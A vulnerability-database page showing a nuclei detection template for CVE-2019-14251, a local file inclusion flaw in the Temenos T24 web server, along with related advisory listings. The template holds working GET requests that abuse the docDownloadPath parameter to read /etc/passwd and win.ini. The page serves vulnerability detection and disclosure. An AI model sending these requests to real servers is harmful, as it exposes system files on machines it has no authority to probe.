Lucene search
K

T24 Web Server - Local File Inclusion

🗓️ 06 Jul 2026 03:02:03Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 42 Views

T24 Web Server - Local File Inclusion, vulnerability impact, remediatio

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2019-14251
9 Mar 202409:36
circl
CNVD
TEMENOS Channels Path Traversal Vulnerability
10 Dec 201900:00
cnvd
CVE
CVE-2019-14251
9 Dec 201916:39
cve
Cvelist
CVE-2019-14251
9 Dec 201916:39
cvelist
NVD
CVE-2019-14251
9 Dec 201917:15
nvd
OSV
CVE-2019-14251
9 Dec 201917:15
osv
Prion
Design/Logic Flaw
9 Dec 201917:15
prion
RedhatCVE
CVE-2019-14251
22 May 202508:26
redhatcve
VulnCheck KEV
VulnCheck KEV: CVE-2019-14251
14 Jan 202400:00
vulncheck_kev
id: CVE-2019-14251

info:
  name: T24 Web Server - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: T24 web server is vulnerable to unauthenticated local file inclusion that permits an attacker to exfiltrate data directly from server.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.
  remediation: |
    Apply the latest security patches or updates provided by the vendor to fix the LFI vulnerability in the T24 Web Server.
  reference:
    - https://github.com/kmkz/exploit/blob/master/CVE-2019-14251-TEMENOS-T24.txt
    - https://vuldb.com/?id.146815
    - https://nvd.nist.gov/vuln/detail/CVE-2019-14251
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2019-14251
    cwe-id: CWE-22
    epss-score: 0.07849
    epss-percentile: 0.93976
    cpe: cpe:2.3:a:temenos:t24:r15.01:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: temenos
    product: t24
  tags: cve,cve2019,temenos,lfi,unauth,vkev,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/WealthT24/GetImage?docDownloadPath=/etc/passwd"
      - "{{BaseURL}}/WealthT24/GetImage?docDownloadPath=c:/windows/win.ini"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"
          - "for 16-bit app support"
        condition: or

      - type: status
        status:
          - 200
# digest: 490a0046304402206fab72bc7971ebec2b50d6a48c56adee7e21a10d1e0e310b75c0072da7a3e020022002ee52dcd5d7170269d9b02e30427ed42c9900f54e88a7b439077be59aa5e1c1:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.1High risk
Vulners AI Score7.1
CVSS 25
CVSS 3.17.5
EPSS0.07849
42